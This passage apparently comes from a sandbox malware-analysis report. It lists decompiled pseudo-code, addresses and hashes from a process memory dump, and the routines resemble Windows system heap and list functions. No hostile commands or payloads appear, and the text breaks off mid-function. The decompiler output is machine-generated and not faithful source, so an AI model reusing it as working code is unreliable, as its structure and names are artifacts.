                                  				L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                  				_t41 =  *0x35184c4; // 0x0
                                  				E03442280(L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x35186b4);
                                  				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                  				_t46 = _t65 + 0xe8;
                                  				_t62 =  *_t46;
                                  				_t60 =  *((intOrPtr*)(_t46 + 4));
                                  				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                  					_t61 = 3;
                                  					asm("int 0x29");
                                  					_push(_t65);
                                  					_t66 = _t61;
                                  					_t23 = _t66 + 0x14; // 0x8df8084c
                                  					_push( *_t23);
                                  					E034695D0();
                                  					_t24 = _t66 + 0x10; // 0x89e04d8b
                                  					_push( *_t24);
                                  					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                  					_t48 = E034695D0();
                                  					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                  					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                  					return _t48;
                                  				} else {
                                  					 *_t60 = _t62;
                                  					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                  					 *(_t68 - 4) = 0xfffffffe;
                                  					E03429325();
                                  					_t50 =  *0x35184c4; // 0x0
                                  					return E0347D0D1(L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                  				}
                                  			}















                                  0x03429240
                                  0x03429242
                                  0x03429247
                                  0x0342924c
                                  0x0342924e
                                  0x03429255
                                  0x03429257
                                  0x0342925a
                                  0x0342925f
                                  0x0342925f
                                  0x03429266
                                  0x03429271
                                  0x03429276
                                  0x03429279
                                  0x0342927e
                                  0x03429295
                                  0x0342929a
                                  0x034292b1
                                  0x034292b6
                                  0x034292d7
                                  0x034292dc
                                  0x034292e0
                                  0x034292e6
                                  0x034292e8
                                  0x034292ee
                                  0x03429332
                                  0x03429333
                                  0x03429337
                                  0x03429338
                                  0x0342933a
                                  0x0342933a
                                  0x0342933d
                                  0x03429342
                                  0x03429342
                                  0x03429345
                                  0x03429349
                                  0x0342934e
                                  0x03429352
                                  0x03429357
                                  0x034292f4
                                  0x034292f4
                                  0x034292f6
                                  0x034292f9
                                  0x03429300
                                  0x03429306
                                  0x03429324
                                  0x03429324

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ea4685400cc2a8a61eb886de9d1f4dd21c075b2daabfbb1af504582defd89716
                                  • Instruction ID: b000085a8e11df084f2b29da7baa02d46053f83230d2485192464221e3269df6
                                  • Opcode Fuzzy Hash: ea4685400cc2a8a61eb886de9d1f4dd21c075b2daabfbb1af504582defd89716
                                  • Instruction Fuzzy Hash: A2215936450700DFC721EF29CA40F5ABBB9BF08704F54496EE1099E6A2CB74E956DB88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E034B4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr* _t18;
                                  				intOrPtr _t24;
                                  				intOrPtr* _t27;
                                  				intOrPtr* _t30;
                                  				intOrPtr* _t31;
                                  				intOrPtr _t33;
                                  				intOrPtr* _t34;
                                  				intOrPtr* _t35;
                                  				void* _t37;
                                  				void* _t38;
                                  				void* _t39;
                                  				void* _t43;
                                  
                                  				_t39 = __eflags;
                                  				_t35 = __edi;
                                  				_push(8);
                                  				_push(0x35008d0);
                                  				E0347D08C(__ebx, __edi, __esi);
                                  				_t37 = __ecx;
                                  				E034B41E8(__ebx, __edi, __ecx, _t39);
                                  				E0343EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                  				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                  				_t18 = _t37 + 8;
                                  				_t33 =  *_t18;
                                  				_t27 =  *((intOrPtr*)(_t18 + 4));
                                  				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                  					L8:
                                  					_push(3);
                                  					asm("int 0x29");
                                  				} else {
                                  					 *_t27 = _t33;
                                  					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                  					_t35 = 0x35187e4;
                                  					_t18 =  *0x35187e0; // 0x0
                                  					while(_t18 != 0) {
                                  						_t43 = _t18 -  *0x3515cd0; // 0xffffffff
                                  						if(_t43 >= 0) {
                                  							_t31 =  *0x35187e4; // 0x0
                                  							_t18 =  *_t31;
                                  							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                  								goto L8;
                                  							} else {
                                  								 *0x35187e4 = _t18;
                                  								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                  								L03427055(_t31 + 0xfffffff8);
                                  								_t24 =  *0x35187e0; // 0x0
                                  								_t18 = _t24 - 1;
                                  								 *0x35187e0 = _t18;
                                  								continue;
                                  							}
                                  						}
                                  						goto L9;
                                  					}
                                  				}
                                  				L9:
                                  				__eflags =  *0x3515cd0;
                                  				if( *0x3515cd0 <= 0) {
                                  					L03427055(_t37);
                                  				} else {
                                  					_t30 = _t37 + 8;
                                  					_t34 =  *0x35187e8; // 0x0
                                  					__eflags =  *_t34 - _t35;
                                  					if( *_t34 != _t35) {
                                  						goto L8;
                                  					} else {
                                  						 *_t30 = _t35;
                                  						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                  						 *_t34 = _t30;
                                  						 *0x35187e8 = _t30;
                                  						 *0x35187e0 = _t18 + 1;
                                  					}
                                  				}
                                  				 *(_t38 - 4) = 0xfffffffe;
                                  				return E0347D0D1(L034B4320());
                                  			}















                                  0x034b4257
                                  0x034b4257
                                  0x034b4257
                                  0x034b4259
                                  0x034b425e
                                  0x034b4263
                                  0x034b4265
                                  0x034b4273
                                  0x034b4278
                                  0x034b427c
                                  0x034b427f
                                  0x034b4281
                                  0x034b4287
                                  0x034b42d7
                                  0x034b42d7
                                  0x034b42da
                                  0x034b428d
                                  0x034b428d
                                  0x034b428f
                                  0x034b4292
                                  0x034b4297
                                  0x034b429c
                                  0x034b42a0
                                  0x034b42a6
                                  0x034b42a8
                                  0x034b42ae
                                  0x034b42b3
                                  0x00000000
                                  0x034b42ba
                                  0x034b42ba
                                  0x034b42bf
                                  0x034b42c5
                                  0x034b42ca
                                  0x034b42cf
                                  0x034b42d0
                                  0x00000000
                                  0x034b42d0
                                  0x034b42b3
                                  0x00000000
                                  0x034b42a6
                                  0x034b429c
                                  0x034b42dc
                                  0x034b42dc
                                  0x034b42e3
                                  0x034b4309
                                  0x034b42e5
                                  0x034b42e5
                                  0x034b42e8
                                  0x034b42ee
                                  0x034b42f0
                                  0x00000000
                                  0x034b42f2
                                  0x034b42f2
                                  0x034b42f4
                                  0x034b42f7
                                  0x034b42f9
                                  0x034b4300
                                  0x034b4300
                                  0x034b42f0
                                  0x034b430e
                                  0x034b431f

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d962c253f29a891572b72ff21650345b874d059787ecc2c11d9ee0578db09860
                                  • Instruction ID: 30b2faeb74959ec258ea8f4213940361ad4083e84f0500f57ce2736c2f95d8c7
                                  • Opcode Fuzzy Hash: d962c253f29a891572b72ff21650345b874d059787ecc2c11d9ee0578db09860
                                  • Instruction Fuzzy Hash: 90219F75901710CFC729EF26D040A94BBF0FB86394B5881AFC1958F3A6D732C486EB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E03452397(intOrPtr _a4) {
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t11;
                                  				void* _t19;
                                  				void* _t25;
                                  				void* _t26;
                                  				intOrPtr _t27;
                                  				void* _t28;
                                  				void* _t29;
                                  
                                  				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                  				if( *0x351848c != 0) {
                                  					L0344FAD0(0x3518610);
                                  					if( *0x351848c == 0) {
                                  						E0344FA00(0x3518610, _t19, _t27, 0x3518610);
                                  						goto L1;
                                  					} else {
                                  						_push(0);
                                  						_push(_a4);
                                  						_t26 = 4;
                                  						_t29 = E03452581(0x3518610, 0x34050a0, _t26, _t27, _t28);
                                  						E0344FA00(0x3518610, 0x34050a0, _t27, 0x3518610);
                                  					}
                                  				} else {
                                  					L1:
                                  					_t11 =  *0x3518614; // 0x0
                                  					if(_t11 == 0) {
                                  						_t11 = E03464886(0x3401088, 1, 0x3518614);
                                  					}
                                  					_push(0);
                                  					_push(_a4);
                                  					_t25 = 4;
                                  					_t29 = E03452581(0x3518610, (_t11 << 4) + 0x3405070, _t25, _t27, _t28);
                                  				}
                                  				if(_t29 != 0) {
                                  					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                  					 *((char*)(_t29 + 0x40)) = 0;
                                  				}
                                  				return _t29;
                                  			}















                                  0x034523b0
                                  0x034523b6
                                  0x03452409
                                  0x03452415
                                  0x03495ae9
                                  0x00000000
                                  0x0345241b
                                  0x0345241b
                                  0x0345241d
                                  0x03452427
                                  0x0345242e
                                  0x03452430
                                  0x03452430
                                  0x034523b8
                                  0x034523b8
                                  0x034523b8
                                  0x034523bf
                                  0x034523fc
                                  0x034523fc
                                  0x034523c1
                                  0x034523c3
                                  0x034523d0
                                  0x034523d8
                                  0x034523d8
                                  0x034523dc
                                  0x034523de
                                  0x034523e1
                                  0x034523e1
                                  0x034523ec

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e8c3312c114161ec36580df7ba3e22235a93f6f8f754ab1f759ec058edc99f28
                                  • Instruction ID: 2fcdd144f46bb3ca9bed008a03a8a44073575760038f3892577bd00f3bc05146
                                  • Opcode Fuzzy Hash: e8c3312c114161ec36580df7ba3e22235a93f6f8f754ab1f759ec058edc99f28
                                  • Instruction Fuzzy Hash: B511DF31B043046FE730EA3AAC84F16B6D9EBA0650F18486BFD01AF292C7F4E845975C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E034A46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                  				signed short* _v8;
                                  				unsigned int _v12;
                                  				intOrPtr _v16;
                                  				signed int _t22;
                                  				signed char _t23;
                                  				short _t32;
                                  				void* _t38;
                                  				char* _t40;
                                  
                                  				_v12 = __edx;
                                  				_t29 = 0;
                                  				_v8 = __ecx;
                                  				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                  				_t38 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                  				if(_t38 != 0) {
                                  					_t40 = _a4;
                                  					 *_t40 = 1;
                                  					E0346F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                  					_t22 = _v12 >> 1;
                                  					_t32 = 0x2e;
                                  					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                  					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                  					_t23 = E0345D268(_t38, 1);
                                  					asm("sbb al, al");
                                  					 *_t40 =  ~_t23 + 1;
                                  					L034477F0(_v16, 0, _t38);
                                  				} else {
                                  					 *_a4 = 0;
                                  					_t29 = 0xc0000017;
                                  				}
                                  				return _t29;
                                  			}











                                  0x034a46b7
                                  0x034a46ba
                                  0x034a46c5
                                  0x034a46c8
                                  0x034a46d0
                                  0x034a46d4
                                  0x034a46e6
                                  0x034a46e9
                                  0x034a46f4
                                  0x034a46ff
                                  0x034a4705
                                  0x034a4706
                                  0x034a470c
                                  0x034a4713
                                  0x034a471b
                                  0x034a4723
                                  0x034a4725
                                  0x034a46d6
                                  0x034a46d9
                                  0x034a46db
                                  0x034a46db
                                  0x034a4732

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                  • Instruction ID: 6fbe5ccebc9c907e1d94f2d0eeed6c2867c692c30aceabdd06a5d5ad46afa010
                                  • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                  • Instruction Fuzzy Hash: 97110276904208BFC701DF5E98808BEBBB9EF95300F1080AEF9848F350DA318D55C3A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 42%
                                  			E0342C962(char __ecx) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t19;
                                  				char _t22;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				char _t32;
                                  				char _t34;
                                  				intOrPtr _t35;
                                  				intOrPtr _t37;
                                  				intOrPtr* _t38;
                                  				signed int _t39;
                                  
                                  				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                  				_v8 =  *0x351d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                  				_t34 = __ecx;
                                  				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                  					_t26 = 0;
                                  					E0343EEF0(0x35170a0);
                                  					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                  					if(E034AF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                  						L9:
                                  						E0343EB70(_t29, 0x35170a0);
                                  						_t19 = _t26;
                                  						L2:
                                  						_pop(_t35);
                                  						_pop(_t37);
                                  						_pop(_t27);
                                  						return E0346B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                  					}
                                  					_t29 = _t34;
                                  					_t26 = E034AF1FC(_t34, _t32);
                                  					if(_t26 < 0) {
                                  						goto L9;
                                  					}
                                  					_t38 =  *0x35170c0; // 0x0
                                  					while(_t38 != 0x35170c0) {
                                  						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                  						_t38 =  *_t38;
                                  						_v12 = _t22;
                                  						if(_t22 != 0) {
                                  							_t29 = _t22;
                                  							 *0x351b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                  							_v12();
                                  						}
                                  					}
                                  					goto L9;
                                  				}
                                  				_t19 = 0;
                                  				goto L2;
                                  			}


















                                  0x0342c96a
                                  0x0342c974
                                  0x0342c988
                                  0x0342c98a
                                  0x03497c9d
                                  0x03497c9f
                                  0x03497ca4
                                  0x03497cae
                                  0x03497cf0
                                  0x03497cf5
                                  0x03497cfa
                                  0x0342c992
                                  0x0342c996
                                  0x0342c997
                                  0x0342c998
                                  0x0342c9a3
                                  0x0342c9a3
                                  0x03497cb0
                                  0x03497cb7
                                  0x03497cbb
                                  0x00000000
                                  0x00000000
                                  0x03497cbd
                                  0x03497ce8
                                  0x03497cc5
                                  0x03497cc8
                                  0x03497cca
                                  0x03497cd0
                                  0x03497cd6
                                  0x03497cde
                                  0x03497ce4
                                  0x03497ce4
                                  0x03497cd0
                                  0x00000000
                                  0x03497ce8
                                  0x0342c990
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 771262fae00d98b912c1a0fcde0c3647c0b77800b9afd05c01f6bb790a7f2881
                                  • Instruction ID: 88343ee540108c58e9ff6d2d4bb71be072f920076f166c20cd9a66abf0f60238
                                  • Opcode Fuzzy Hash: 771262fae00d98b912c1a0fcde0c3647c0b77800b9afd05c01f6bb790a7f2881
                                  • Instruction Fuzzy Hash: E211A0323107069FDB10EF2D9C85A2BBFE5BB88610B04052BE8429F661DB20EC55CBD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E034637F5(void* __ecx, intOrPtr* __edx) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed char _t6;
                                  				intOrPtr _t13;
                                  				intOrPtr* _t20;
                                  				intOrPtr* _t27;
                                  				void* _t28;
                                  				intOrPtr* _t29;
                                  
                                  				_t27 = __edx;
                                  				_t28 = __ecx;
                                  				if(__edx == 0) {
                                  					E03442280(_t6, 0x3518550);
                                  				}
                                  				_t29 = E0346387E(_t28);
                                  				if(_t29 == 0) {
                                  					L6:
                                  					if(_t27 == 0) {
                                  						E0343FFB0(0x3518550, _t27, 0x3518550);
                                  					}
                                  					if(_t29 == 0) {
                                  						return 0xc0000225;
                                  					} else {
                                  						if(_t27 != 0) {
                                  							goto L14;
                                  						}
                                  						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                  						goto L11;
                                  					}
                                  				} else {
                                  					_t13 =  *_t29;
                                  					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                  						L13:
                                  						_push(3);
                                  						asm("int 0x29");
                                  						L14:
                                  						 *_t27 = _t29;
                                  						L11:
                                  						return 0;
                                  					}
                                  					_t20 =  *((intOrPtr*)(_t29 + 4));
                                  					if( *_t20 != _t29) {
                                  						goto L13;
                                  					}
                                  					 *_t20 = _t13;
                                  					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                  					asm("btr eax, ecx");
                                  					goto L6;
                                  				}
                                  			}











                                  0x034637fa
                                  0x034637fc
                                  0x03463805
                                  0x03463808
                                  0x03463808
                                  0x03463814
                                  0x03463818
                                  0x03463846
                                  0x03463848
                                  0x0346384b
                                  0x0346384b
                                  0x03463852
                                  0x00000000
                                  0x03463854
                                  0x03463856
                                  0x00000000
                                  0x00000000
                                  0x03463863
                                  0x00000000
                                  0x03463863
                                  0x0346381a
                                  0x0346381a
                                  0x0346381f
                                  0x0346386e
                                  0x0346386e
                                  0x03463871
                                  0x03463873
                                  0x03463873
                                  0x03463868
                                  0x00000000
                                  0x03463868
                                  0x03463821
                                  0x03463826
                                  0x00000000
                                  0x00000000
                                  0x03463828
                                  0x0346382a
                                  0x03463841
                                  0x00000000
                                  0x03463841

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f943989df893173be0b2167086e2a6539988b6cf7be0f400b5a633de557c6b16
                                  • Instruction ID: 39a8d128e21b3d866119d11afd4f7cf5cb16af047665ba928883e5544b49b384
                                  • Opcode Fuzzy Hash: f943989df893173be0b2167086e2a6539988b6cf7be0f400b5a633de557c6b16
                                  • Instruction Fuzzy Hash: B0010879A016905BC337CF1A9900E6BBBEADF86A5071954AFE8058F320D730C801C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0345002D() {
                                  				void* _t11;
                                  				char* _t14;
                                  				signed char* _t16;
                                  				char* _t27;
                                  				signed char* _t29;
                                  
                                  				_t11 = E03447D50();
                                  				_t27 = 0x7ffe0384;
                                  				if(_t11 != 0) {
                                  					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  				} else {
                                  					_t14 = 0x7ffe0384;
                                  				}
                                  				_t29 = 0x7ffe0385;
                                  				if( *_t14 != 0) {
                                  					if(E03447D50() == 0) {
                                  						_t16 = 0x7ffe0385;
                                  					} else {
                                  						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                  					}
                                  					if(( *_t16 & 0x00000040) != 0) {
                                  						goto L18;
                                  					} else {
                                  						goto L3;
                                  					}
                                  				} else {
                                  					L3:
                                  					if(E03447D50() != 0) {
                                  						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  					}
                                  					if( *_t27 != 0) {
                                  						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                  							goto L5;
                                  						}
                                  						if(E03447D50() != 0) {
                                  							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                  						}
                                  						if(( *_t29 & 0x00000020) == 0) {
                                  							goto L5;
                                  						}
                                  						L18:
                                  						return 1;
                                  					} else {
                                  						L5:
                                  						return 0;
                                  					}
                                  				}
                                  			}








                                  0x03450032
                                  0x03450037
                                  0x03450043
                                  0x03494b3a
                                  0x03450049
                                  0x03450049
                                  0x03450049
                                  0x0345004e
                                  0x03450053
                                  0x03494b48
                                  0x03494b5a
                                  0x03494b4a
                                  0x03494b53
                                  0x03494b53
                                  0x03494b5f
                                  0x00000000
                                  0x03494b61
                                  0x00000000
                                  0x03494b61
                                  0x03450059
                                  0x03450059
                                  0x03450060
                                  0x03494b6f
                                  0x03494b6f
                                  0x03450069
                                  0x03494b83
                                  0x00000000
                                  0x00000000
                                  0x03494b90
                                  0x03494b9b
                                  0x03494b9b
                                  0x03494ba4
                                  0x00000000
                                  0x00000000
                                  0x03494baa
                                  0x00000000
                                  0x0345006f
                                  0x0345006f
                                  0x00000000
                                  0x0345006f
                                  0x03450069

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                  • Instruction ID: 5f0ec7d5ece047377f10fc9f976b9712bd83723508a19224e0fdf890358a074b
                                  • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                  • Instruction Fuzzy Hash: A111C276A056808FEB22DB26D544B267BD8AB41B54F0D00E3ED249F792D328C843C25C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0343766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                  				char _v8;
                                  				void* _t22;
                                  				void* _t24;
                                  				intOrPtr _t29;
                                  				intOrPtr* _t30;
                                  				void* _t42;
                                  				intOrPtr _t47;
                                  
                                  				_push(__ecx);
                                  				_t36 =  &_v8;
                                  				if(E0345F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                  					L10:
                                  					_t22 = 0;
                                  				} else {
                                  					_t24 = _v8 + __ecx;
                                  					_t42 = _t24;
                                  					if(_t24 < __ecx) {
                                  						goto L10;
                                  					} else {
                                  						if(E0345F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                  							goto L10;
                                  						} else {
                                  							_t29 = _v8 + _t42;
                                  							if(_t29 < _t42) {
                                  								goto L10;
                                  							} else {
                                  								_t47 = _t29;
                                  								_t30 = _a16;
                                  								if(_t30 != 0) {
                                  									 *_t30 = _t47;
                                  								}
                                  								if(_t47 == 0) {
                                  									goto L10;
                                  								} else {
                                  									_t22 = L03444620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t22;
                                  			}










                                  0x03437672
                                  0x0343767f
                                  0x03437689
                                  0x034376de
                                  0x034376de
                                  0x0343768b
                                  0x03437691
                                  0x03437693
                                  0x03437697
                                  0x00000000
                                  0x03437699
                                  0x034376a8
                                  0x00000000
                                  0x034376aa
                                  0x034376ad
                                  0x034376b1
                                  0x00000000
                                  0x034376b3
                                  0x034376b3
                                  0x034376b5
                                  0x034376ba
                                  0x034376bc
                                  0x034376bc
                                  0x034376c0
                                  0x00000000
                                  0x034376c2
                                  0x034376ce
                                  0x034376ce
                                  0x034376c0
                                  0x034376b1
                                  0x034376a8
                                  0x03437697
                                  0x034376d9

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                  • Instruction ID: f0a5afc6c87cd0046f2d0c22370d0ebb68f8c5241ed0d5f090198e31e3c27311
                                  • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                  • Instruction Fuzzy Hash: CD018872740119AFD720DE5ECD51E5BBBADEB89670B144526B948CF3A0DA30DD0187A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E03429080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr* _t51;
                                  				intOrPtr _t59;
                                  				signed int _t64;
                                  				signed int _t67;
                                  				signed int* _t71;
                                  				signed int _t74;
                                  				signed int _t77;
                                  				signed int _t82;
                                  				intOrPtr* _t84;
                                  				void* _t85;
                                  				intOrPtr* _t87;
                                  				void* _t94;
                                  				signed int _t95;
                                  				intOrPtr* _t97;
                                  				signed int _t99;
                                  				signed int _t102;
                                  				void* _t104;
                                  
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_t97 = __ecx;
                                  				_t102 =  *(__ecx + 0x14);
                                  				if((_t102 & 0x02ffffff) == 0x2000000) {
                                  					_t102 = _t102 | 0x000007d0;
                                  				}
                                  				_t48 =  *[fs:0x30];
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                  					_t102 = _t102 & 0xff000000;
                                  				}
                                  				_t80 = 0x35185ec;
                                  				E03442280(_t48, 0x35185ec);
                                  				_t51 =  *_t97 + 8;
                                  				if( *_t51 != 0) {
                                  					L6:
                                  					return E0343FFB0(_t80, _t97, _t80);
                                  				} else {
                                  					 *(_t97 + 0x14) = _t102;
                                  					_t84 =  *0x351538c; // 0x77e06848
                                  					if( *_t84 != 0x3515388) {
                                  						_t85 = 3;
                                  						asm("int 0x29");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						_push(0x2c);
                                  						_push(0x34ff6e8);
                                  						E0347D0E8(0x35185ec, _t97, _t102);
                                  						 *((char*)(_t104 - 0x1d)) = 0;
                                  						_t99 =  *(_t104 + 8);
                                  						__eflags = _t99;
                                  						if(_t99 == 0) {
                                  							L13:
                                  							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                  							if(__eflags == 0) {
                                  								E034F88F5(_t80, _t85, 0x3515388, _t99, _t102, __eflags);
                                  							}
                                  						} else {
                                  							__eflags = _t99 -  *0x35186c0; // 0xca07b0
                                  							if(__eflags == 0) {
                                  								goto L13;
                                  							} else {
                                  								__eflags = _t99 -  *0x35186b8; // 0x0
                                  								if(__eflags == 0) {
                                  									goto L13;
                                  								} else {
                                  									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                  									__eflags =  *((char*)(_t59 + 0x28));
                                  									if( *((char*)(_t59 + 0x28)) == 0) {
                                  										E03442280(_t99 + 0xe0, _t99 + 0xe0);
                                  										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                  										__eflags =  *((char*)(_t99 + 0xe5));
                                  										if(__eflags != 0) {
                                  											E034F88F5(0x35185ec, _t85, 0x3515388, _t99, _t102, __eflags);
                                  										} else {
                                  											__eflags =  *((char*)(_t99 + 0xe4));
                                  											if( *((char*)(_t99 + 0xe4)) == 0) {
                                  												 *((char*)(_t99 + 0xe4)) = 1;
                                  												_push(_t99);
                                  												_push( *((intOrPtr*)(_t99 + 0x24)));
                                  												E0346AFD0();
                                  											}
                                  											while(1) {
                                  												_t71 = _t99 + 8;
                                  												 *(_t104 - 0x2c) = _t71;
                                  												_t80 =  *_t71;
                                  												_t95 = _t71[1];
                                  												 *(_t104 - 0x28) = _t80;
                                  												 *(_t104 - 0x24) = _t95;
